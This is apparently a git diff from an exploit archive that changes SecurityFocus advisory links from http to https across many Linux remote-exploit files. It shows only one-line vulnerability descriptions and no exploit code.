--- a/exploits/linux/remote/25706.cpp +++ b/exploits/linux/remote/25706.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13766/info +source: https://www.securityfocus.com/bid/13766/info GNU Mailutils mail is affected by an email header buffer overflow vulnerability. diff --git a/exploits/linux/remote/25802.txt b/exploits/linux/remote/25802.txt index f2aca637a..5719ae525 100644 --- a/exploits/linux/remote/25802.txt +++ b/exploits/linux/remote/25802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13883/info +source: https://www.securityfocus.com/bid/13883/info tattle is affected by a remote command execution vulnerability. diff --git a/exploits/linux/remote/25820.txt b/exploits/linux/remote/25820.txt index 0a5af2dd6..a50068d01 100644 --- a/exploits/linux/remote/25820.txt +++ b/exploits/linux/remote/25820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13959/info +source: https://www.securityfocus.com/bid/13959/info SurfinGate may allow an attacker to circumvent file filters. diff --git a/exploits/linux/remote/26024.txt b/exploits/linux/remote/26024.txt index adc1b3a89..3ae45c71e 100644 --- a/exploits/linux/remote/26024.txt +++ b/exploits/linux/remote/26024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14369/info +source: https://www.securityfocus.com/bid/14369/info Internet Graphics Server is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/26101.txt b/exploits/linux/remote/26101.txt index b7d32e00a..9be5dc28c 100644 --- a/exploits/linux/remote/26101.txt +++ b/exploits/linux/remote/26101.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14487/info +source: https://www.securityfocus.com/bid/14487/info EMC Navisphere Manager is affected by directory traversal and information disclosure vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/26198.txt b/exploits/linux/remote/26198.txt index 1337b6863..fc1e632cd 100644 --- a/exploits/linux/remote/26198.txt +++ b/exploits/linux/remote/26198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14665/info +source: https://www.securityfocus.com/bid/14665/info Astaro Security Linux is prone to a weakness that may allow remote attackers to connect to arbitrary ports on a vulnerable computer. diff --git a/exploits/linux/remote/26288.txt b/exploits/linux/remote/26288.txt index 9e0920613..731012a2f 100644 --- a/exploits/linux/remote/26288.txt +++ b/exploits/linux/remote/26288.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14888/info +source: https://www.securityfocus.com/bid/14888/info Mozilla Browser/Firefox are affected by an arbitrary command-execution vulnerability. diff --git a/exploits/linux/remote/26536.txt b/exploits/linux/remote/26536.txt index a0b1e4459..11c53e0d4 100644 --- a/exploits/linux/remote/26536.txt +++ b/exploits/linux/remote/26536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15488/info +source: https://www.securityfocus.com/bid/15488/info Qualcomm Worldmail server is prone to a directory traversal vulnerability. diff --git a/exploits/linux/remote/26540.txt b/exploits/linux/remote/26540.txt index 750484d6a..11175a5f7 100644 --- a/exploits/linux/remote/26540.txt +++ b/exploits/linux/remote/26540.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15507/info +source: https://www.securityfocus.com/bid/15507/info Inkscape is prone to a buffer overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before copying it into a finite sized buffer. diff --git a/exploits/linux/remote/26741.pl b/exploits/linux/remote/26741.pl index bdfc104cb..1009135aa 100755 --- a/exploits/linux/remote/26741.pl +++ b/exploits/linux/remote/26741.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15730/info +source: https://www.securityfocus.com/bid/15730/info Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/26913.c b/exploits/linux/remote/26913.c index 8768a16ed..557a15d46 100644 --- a/exploits/linux/remote/26913.c +++ b/exploits/linux/remote/26913.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15968/info +// source: https://www.securityfocus.com/bid/15968/info Info-ZIP 'unzip' is susceptible to a filename buffer-overflow vulnerability. The application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/27032.txt b/exploits/linux/remote/27032.txt index 704681139..b3293814b 100644 --- a/exploits/linux/remote/27032.txt +++ b/exploits/linux/remote/27032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16151/info +source: https://www.securityfocus.com/bid/16151/info HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/27150.txt b/exploits/linux/remote/27150.txt index 1000655ca..47e63dfef 100644 --- a/exploits/linux/remote/27150.txt 
+++ b/exploits/linux/remote/27150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16427/info +source: https://www.securityfocus.com/bid/16427/info Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain. diff --git a/exploits/linux/remote/27233.txt b/exploits/linux/remote/27233.txt index 5c4843350..55e92bb5b 100644 --- a/exploits/linux/remote/27233.txt +++ b/exploits/linux/remote/27233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16668/info +source: https://www.securityfocus.com/bid/16668/info SAP Business Connector is prone to a file-access/deletion vulnerability. This issue arises due to an access-validation error. diff --git a/exploits/linux/remote/27234.txt b/exploits/linux/remote/27234.txt index d8670855b..458133bc6 100644 --- a/exploits/linux/remote/27234.txt +++ b/exploits/linux/remote/27234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16668/info +source: https://www.securityfocus.com/bid/16668/info SAP Business Connector is prone to a file-access/deletion vulnerability. This issue arises due to an access-validation error. diff --git a/exploits/linux/remote/27235.txt b/exploits/linux/remote/27235.txt index cc2fc0be3..2d7687a38 100644 --- a/exploits/linux/remote/27235.txt +++ b/exploits/linux/remote/27235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16671/info +source: https://www.securityfocus.com/bid/16671/info SAP Business Connector is susceptible to an input-validation vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/27244.txt b/exploits/linux/remote/27244.txt index 08046a7d9..542ad7c5c 100644 --- a/exploits/linux/remote/27244.txt +++ b/exploits/linux/remote/27244.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16696/info +source: https://www.securityfocus.com/bid/16696/info Wimpy MP3 is prone to a weakness that permits the overwriting of a text file with arbitrary attacker-supplied data. diff --git a/exploits/linux/remote/27326.txt b/exploits/linux/remote/27326.txt index 13b5f2541..101078d4e 100644 --- a/exploits/linux/remote/27326.txt +++ b/exploits/linux/remote/27326.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16850/info +source: https://www.securityfocus.com/bid/16850/info MySQL is prone to a query-logging-bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in the 'mysql_real_query()' function and in the query-logging functionality. diff --git a/exploits/linux/remote/27630.txt b/exploits/linux/remote/27630.txt index 7c5f68d19..ea5b10071 100644 --- a/exploits/linux/remote/27630.txt +++ b/exploits/linux/remote/27630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17484/info +source: https://www.securityfocus.com/bid/17484/info Plone is susceptible to a remote access-control bypass vulnerability. This issue is due to the application's failure to properly enforce privileges to various MembershipTool methods. diff --git a/exploits/linux/remote/27801.txt b/exploits/linux/remote/27801.txt index 483ffaba3..b50ad146a 100644 --- a/exploits/linux/remote/27801.txt +++ b/exploits/linux/remote/27801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17808/info +source: https://www.securityfocus.com/bid/17808/info Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced. diff --git a/exploits/linux/remote/27802.txt b/exploits/linux/remote/27802.txt index 4681c7716..620f964dc 100644 --- a/exploits/linux/remote/27802.txt +++ b/exploits/linux/remote/27802.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17808/info +source: https://www.securityfocus.com/bid/17808/info Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced. diff --git a/exploits/linux/remote/27902.txt b/exploits/linux/remote/27902.txt index 25625c8cf..06cdee553 100644 --- a/exploits/linux/remote/27902.txt +++ b/exploits/linux/remote/27902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18068/info +source: https://www.securityfocus.com/bid/18068/info Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/27987.html b/exploits/linux/remote/27987.html index bf949ef4a..5e5ad2fef 100644 --- a/exploits/linux/remote/27987.html +++ b/exploits/linux/remote/27987.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18308/info +source: https://www.securityfocus.com/bid/18308/info Multiple web browsers are prone to a JavaScript key-filtering vulnerability because the browsers fail to securely handle keystroke input from users. diff --git a/exploits/linux/remote/28181.c b/exploits/linux/remote/28181.c index 16148c6d7..128c8d023 100644 --- a/exploits/linux/remote/28181.c +++ b/exploits/linux/remote/28181.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18859/info +// source: https://www.securityfocus.com/bid/18859/info The AdPlug library is affected by multiple remote buffer-overflow vulnerabilities. These issues are due to the library's failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers. diff --git a/exploits/linux/remote/28314.c b/exploits/linux/remote/28314.c index 630672eeb..d710455f2 100644 --- a/exploits/linux/remote/28314.c +++ b/exploits/linux/remote/28314.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19255/info +// source: https://www.securityfocus.com/bid/19255/info Bomberclone is prone to remote information-disclosure and denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/28397.sh b/exploits/linux/remote/28397.sh index 56735502c..b3e4a5948 100755 --- a/exploits/linux/remote/28397.sh +++ b/exploits/linux/remote/28397.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19555/info +source: https://www.securityfocus.com/bid/19555/info GNU binutils GAS (GNU assembler) is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/28398.txt b/exploits/linux/remote/28398.txt index 4e16c504c..3261b277c 100644 --- a/exploits/linux/remote/28398.txt +++ b/exploits/linux/remote/28398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19559/info +source: https://www.securityfocus.com/bid/19559/info MySQL is prone to these vulnerabilities: diff --git a/exploits/linux/remote/28424.txt b/exploits/linux/remote/28424.txt index ca34bcd94..fd3ccbae3 100644 --- a/exploits/linux/remote/28424.txt +++ b/exploits/linux/remote/28424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19661/info +source: https://www.securityfocus.com/bid/19661/info Apache HTTP server is prone to a security weakness related to HTTP request headers. diff --git a/exploits/linux/remote/28595.txt b/exploits/linux/remote/28595.txt index b34297b17..2389eaaf3 100644 --- a/exploits/linux/remote/28595.txt +++ b/exploits/linux/remote/28595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20067/info +source: https://www.securityfocus.com/bid/20067/info The httpd daemon of BusyBox is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/linux/remote/28639.rb b/exploits/linux/remote/28639.rb index 6c759dcaf..033f033e7 100755 --- a/exploits/linux/remote/28639.rb +++ b/exploits/linux/remote/28639.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20138/info +source: https://www.securityfocus.com/bid/20138/info Apple QuickTime plug-in is prone to an arbitrary-script-execution weakness when executing QuickTime Media Link files (.qtl). diff --git a/exploits/linux/remote/29033.html b/exploits/linux/remote/29033.html index 6545278b6..61252fcfc 100644 --- a/exploits/linux/remote/29033.html +++ b/exploits/linux/remote/29033.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21082/info +source: https://www.securityfocus.com/bid/21082/info Links and ELinks are prone to a remote command-execution vulnerability because the applications fail to properly process website data containing 'smb' commands. diff --git a/exploits/linux/remote/29160.c b/exploits/linux/remote/29160.c index 7abc614e2..fd14d5a66 100644 --- a/exploits/linux/remote/29160.c +++ b/exploits/linux/remote/29160.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/21235/info +source: https://www.securityfocus.com/bid/21235/info GNU Tar is prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. These issues present themselves when the application processes malicious archives. diff --git a/exploits/linux/remote/29302.txt b/exploits/linux/remote/29302.txt index e01bd53ff..675909d9c 100644 --- a/exploits/linux/remote/29302.txt +++ b/exploits/linux/remote/29302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21687/info +source: https://www.securityfocus.com/bid/21687/info XSP is prone to a source code information-disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29383.txt b/exploits/linux/remote/29383.txt index df17cccd5..8ad2297bd 100644 
--- a/exploits/linux/remote/29383.txt +++ b/exploits/linux/remote/29383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21858/info +source: https://www.securityfocus.com/bid/21858/info Adobe Reader Plugin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29471.txt b/exploits/linux/remote/29471.txt index 9f0686c74..1ea4cbd65 100644 --- a/exploits/linux/remote/29471.txt +++ b/exploits/linux/remote/29471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22076/info +source: https://www.securityfocus.com/bid/22076/info BlueZ hidd is prone to a device-command-injection vulnerability. diff --git a/exploits/linux/remote/29496.txt b/exploits/linux/remote/29496.txt index a91c0775f..0d4c0c9e6 100644 --- a/exploits/linux/remote/29496.txt +++ b/exploits/linux/remote/29496.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22121/info +source: https://www.securityfocus.com/bid/22121/info ArsDigita Community System is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29527.pl b/exploits/linux/remote/29527.pl index 378aceaae..c837786eb 100755 --- a/exploits/linux/remote/29527.pl +++ b/exploits/linux/remote/29527.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22252/info +source: https://www.securityfocus.com/bid/22252/info The 'xine' program is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. diff --git a/exploits/linux/remote/29595.txt b/exploits/linux/remote/29595.txt index 35d9d0967..23ac1aaec 100644 --- a/exploits/linux/remote/29595.txt +++ b/exploits/linux/remote/29595.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22520/info +source: https://www.securityfocus.com/bid/22520/info php rrd browser is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/29689.py b/exploits/linux/remote/29689.py index c277de1e7..071d65225 100755 --- a/exploits/linux/remote/29689.py +++ b/exploits/linux/remote/29689.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22757/info +source: https://www.securityfocus.com/bid/22757/info GnuPG is prone to a weakness that may allow an attacker to add arbitrary content into a message without the end user knowing. diff --git a/exploits/linux/remote/29690.py b/exploits/linux/remote/29690.py index 2c8711652..ec6f66d46 100755 --- a/exploits/linux/remote/29690.py +++ b/exploits/linux/remote/29690.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22759/info +source: https://www.securityfocus.com/bid/22759/info KMail is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing. diff --git a/exploits/linux/remote/29691.py b/exploits/linux/remote/29691.py index b2ceb79d3..8bb15a173 100755 --- a/exploits/linux/remote/29691.py +++ b/exploits/linux/remote/29691.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22760/info +source: https://www.securityfocus.com/bid/22760/info Evolution is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing. diff --git a/exploits/linux/remote/29739.txt b/exploits/linux/remote/29739.txt index f46ca439f..c3557a06c 100644 --- a/exploits/linux/remote/29739.txt +++ b/exploits/linux/remote/29739.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22960/info +source: https://www.securityfocus.com/bid/22960/info Apache HTTP servers running with the Tomcat servlet container are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/linux/remote/29753.c b/exploits/linux/remote/29753.c index 13ee7cc91..4fc370834 100644 --- a/exploits/linux/remote/29753.c +++ b/exploits/linux/remote/29753.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23021/info +// source: https://www.securityfocus.com/bid/23021/info The file(1) command is prone to an integer-underflow vulnerability because the command fails to adequately handle user-supplied data. diff --git a/exploits/linux/remote/29768.txt b/exploits/linux/remote/29768.txt index a14707790..05bcb3c6c 100644 --- a/exploits/linux/remote/29768.txt +++ b/exploits/linux/remote/29768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23082/info +source: https://www.securityfocus.com/bid/23082/info Mozilla Firefox is prone to vulnerability that may allow attackers to obtain potentially sensitive information. diff --git a/exploits/linux/remote/29769.txt b/exploits/linux/remote/29769.txt index 56307509b..5184a854f 100644 --- a/exploits/linux/remote/29769.txt +++ b/exploits/linux/remote/29769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23089/info +source: https://www.securityfocus.com/bid/23089/info Opera is prone to vulnerability that may allow attackers to obtain potentially sensitive information. diff --git a/exploits/linux/remote/29770.txt b/exploits/linux/remote/29770.txt index 5fc7386d1..613d34d55 100644 --- a/exploits/linux/remote/29770.txt +++ b/exploits/linux/remote/29770.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23091/info +source: https://www.securityfocus.com/bid/23091/info KDE Konqueror is prone to a vulnerability that may allow attackers to obtain potentially sensitive information. diff --git a/exploits/linux/remote/29932.txt b/exploits/linux/remote/29932.txt index 2c7802997..34c1594cc 100644 --- a/exploits/linux/remote/29932.txt +++ b/exploits/linux/remote/29932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23709/info +source: https://www.securityfocus.com/bid/23709/info Red Hat Directory Server is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/30018.py b/exploits/linux/remote/30018.py index cd676ef0d..945b5fb6b 100755 --- a/exploits/linux/remote/30018.py +++ b/exploits/linux/remote/30018.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23887/info +source: https://www.securityfocus.com/bid/23887/info Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak. diff --git a/exploits/linux/remote/30043.txt b/exploits/linux/remote/30043.txt index 30aa201cb..39756035a 100644 --- a/exploits/linux/remote/30043.txt +++ b/exploits/linux/remote/30043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24004/info +source: https://www.securityfocus.com/bid/24004/info Sun JDK is prone to a multiple vulnerabilities. diff --git a/exploits/linux/remote/30074.txt b/exploits/linux/remote/30074.txt index b1b89d7e7..b1a6950dc 100644 --- a/exploits/linux/remote/30074.txt +++ b/exploits/linux/remote/30074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24111/info +source: https://www.securityfocus.com/bid/24111/info PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files. diff --git a/exploits/linux/remote/30089.txt b/exploits/linux/remote/30089.txt index f4a9f3aac..102c7ac23 100644 
--- a/exploits/linux/remote/30089.txt +++ b/exploits/linux/remote/30089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24161/info +source: https://www.securityfocus.com/bid/24161/info Ruby on Rails is prone to a script-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/30142.txt b/exploits/linux/remote/30142.txt index 5fff48087..369600b6e 100644 --- a/exploits/linux/remote/30142.txt +++ b/exploits/linux/remote/30142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24291/info +source: https://www.securityfocus.com/bid/24291/info GDB is prone to a buffer-overflow vulnerability because it fails to properly check bounds when handling specially crafted executable files. diff --git a/exploits/linux/remote/30186.txt b/exploits/linux/remote/30186.txt index 67980c0f4..f7954ddd3 100644 --- a/exploits/linux/remote/30186.txt +++ b/exploits/linux/remote/30186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24436/info +source: https://www.securityfocus.com/bid/24436/info Firebird SQL is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/remote/30284.vbs b/exploits/linux/remote/30284.vbs index 71a3f60ac..35c32ec87 100644 --- a/exploits/linux/remote/30284.vbs +++ b/exploits/linux/remote/30284.vbs @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24832/info +source: https://www.securityfocus.com/bid/24832/info Sun Java Runtime Environment is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/30285.txt b/exploits/linux/remote/30285.txt index bada251fb..e4b4d12f5 100644 --- a/exploits/linux/remote/30285.txt +++ b/exploits/linux/remote/30285.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24837/info +source: https://www.securityfocus.com/bid/24837/info Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers. diff --git a/exploits/linux/remote/30291.txt b/exploits/linux/remote/30291.txt index 6a39da65c..58b892e26 100644 --- a/exploits/linux/remote/30291.txt +++ b/exploits/linux/remote/30291.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24866/info +source: https://www.securityfocus.com/bid/24866/info Multiple applications using RAR are prone to a NULL-pointer dereference vulnerability. diff --git a/exploits/linux/remote/30319.c b/exploits/linux/remote/30319.c index ebe2616bb..e0ffd27e4 100644 --- a/exploits/linux/remote/30319.c +++ b/exploits/linux/remote/30319.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24965/info +// source: https://www.securityfocus.com/bid/24965/info The 'tcpdump' utility is prone to an integer-underflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. diff --git a/exploits/linux/remote/30439.txt b/exploits/linux/remote/30439.txt index 2d363ed24..04d660ac5 100644 --- a/exploits/linux/remote/30439.txt +++ b/exploits/linux/remote/30439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25142/info +source: https://www.securityfocus.com/bid/25142/info Mozilla Firefox, Thunderbird, and SeaMonkey are prone to a vulnerability that allows JavaScript to execute with unintended privileges. diff --git a/exploits/linux/remote/30454.txt b/exploits/linux/remote/30454.txt index 155a1f867..d8ef2e76e 100644 --- a/exploits/linux/remote/30454.txt +++ b/exploits/linux/remote/30454.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25214/info +source: https://www.securityfocus.com/bid/25214/info BlueCat Networks Adonis devices are prone to a remote privilege-escalation vulnerability. This issue occurs when Proteus appliances are used to upload files to an affected Adonis appliance for TFTP download. diff --git a/exploits/linux/remote/30535.pl b/exploits/linux/remote/30535.pl index 37591306b..08221b08f 100755 --- a/exploits/linux/remote/30535.pl +++ b/exploits/linux/remote/30535.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/25459/info +#source: https://www.securityfocus.com/bid/25459/info # #BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator. # diff --git a/exploits/linux/remote/30536.pl b/exploits/linux/remote/30536.pl index 382c5ead6..6f030781d 100755 --- a/exploits/linux/remote/30536.pl +++ b/exploits/linux/remote/30536.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25459/info +source: https://www.securityfocus.com/bid/25459/info BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator. diff --git a/exploits/linux/remote/30543.txt b/exploits/linux/remote/30543.txt index 755a2b62a..8695171f9 100644 --- a/exploits/linux/remote/30543.txt +++ b/exploits/linux/remote/30543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25483/info +source: https://www.securityfocus.com/bid/25483/info Doomsday Engine is prone to multiple remote vulnerabilities, including multiple buffer-overflow issues, a denial-of-service issue, a format-string issue, and an integer-overflow issue. diff --git a/exploits/linux/remote/30677.pl b/exploits/linux/remote/30677.pl index e1b060187..1921d58bb 100755 --- a/exploits/linux/remote/30677.pl +++ b/exploits/linux/remote/30677.pl 
@@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/26095/info +#source: https://www.securityfocus.com/bid/26095/info # #Asterisk 'asterisk-addons' package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. # diff --git a/exploits/linux/remote/30711.txt b/exploits/linux/remote/30711.txt index 8537e479e..a4f41ac6a 100644 --- a/exploits/linux/remote/30711.txt +++ b/exploits/linux/remote/30711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26212/info +source: https://www.securityfocus.com/bid/26212/info Shttp is prone to a remote directory-traversal vulnerability. diff --git a/exploits/linux/remote/30736.txt b/exploits/linux/remote/30736.txt index 4d837ad37..a4379945c 100644 --- a/exploits/linux/remote/30736.txt +++ b/exploits/linux/remote/30736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26327/info +source: https://www.securityfocus.com/bid/26327/info Emacs is prone to a vulnerability that lets attackers execute arbitrary code. diff --git a/exploits/linux/remote/30907.txt b/exploits/linux/remote/30907.txt index 3e7cd9b76..a027ea966 100644 --- a/exploits/linux/remote/30907.txt +++ b/exploits/linux/remote/30907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26960/info +source: https://www.securityfocus.com/bid/26960/info The Adobe Flash Player ActiveX control is prone to a cross-domain scripting vulnerability. diff --git a/exploits/linux/remote/30971.txt b/exploits/linux/remote/30971.txt index f26129401..f5c2619be 100644 --- a/exploits/linux/remote/30971.txt +++ b/exploits/linux/remote/30971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27103/info +source: https://www.securityfocus.com/bid/27103/info Georgia SoftWorks Secure Shell Server is prone to multiple remote code-execution vulnerabilities: diff --git a/exploits/linux/remote/30998.py b/exploits/linux/remote/30998.py index af0debb26..e0a078cc8 100755 
--- a/exploits/linux/remote/30998.py +++ b/exploits/linux/remote/30998.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27178/info +source: https://www.securityfocus.com/bid/27178/info SynCE is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/linux/remote/31051.txt b/exploits/linux/remote/31051.txt index 48bde03a3..e72e4acdb 100644 --- a/exploits/linux/remote/31051.txt +++ b/exploits/linux/remote/31051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27406/info +source: https://www.securityfocus.com/bid/27406/info Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files. diff --git a/exploits/linux/remote/31052.java b/exploits/linux/remote/31052.java index 5453b99fa..a7b021765 100644 --- a/exploits/linux/remote/31052.java +++ b/exploits/linux/remote/31052.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27409/info +source: https://www.securityfocus.com/bid/27409/info Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/31076.py b/exploits/linux/remote/31076.py index f7ae5f1ff..e580789fb 100755 --- a/exploits/linux/remote/31076.py +++ b/exploits/linux/remote/31076.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27499/info +source: https://www.securityfocus.com/bid/27499/info MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory. diff --git a/exploits/linux/remote/31127.txt b/exploits/linux/remote/31127.txt index 9a2089091..12b26ccd5 100644 --- a/exploits/linux/remote/31127.txt +++ b/exploits/linux/remote/31127.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27700/info +source: https://www.securityfocus.com/bid/27700/info Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources. diff --git a/exploits/linux/remote/31309.c b/exploits/linux/remote/31309.c index 729f3a038..dfa61fa4c 100644 --- a/exploits/linux/remote/31309.c +++ b/exploits/linux/remote/31309.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28017/info +// source: https://www.securityfocus.com/bid/28017/info Ghostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/31396.txt b/exploits/linux/remote/31396.txt index 9c50e72ed..77ff756d2 100644 --- a/exploits/linux/remote/31396.txt +++ b/exploits/linux/remote/31396.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28226/info +source: https://www.securityfocus.com/bid/28226/info The 'lighttpd' program is prone to a vulnerability that may allow attackers to access sensitive information because the application fails to properly handle exceptional conditions. diff --git a/exploits/linux/remote/31462.c b/exploits/linux/remote/31462.c index 5b6033247..9d18b7a02 100644 --- a/exploits/linux/remote/31462.c +++ b/exploits/linux/remote/31462.c 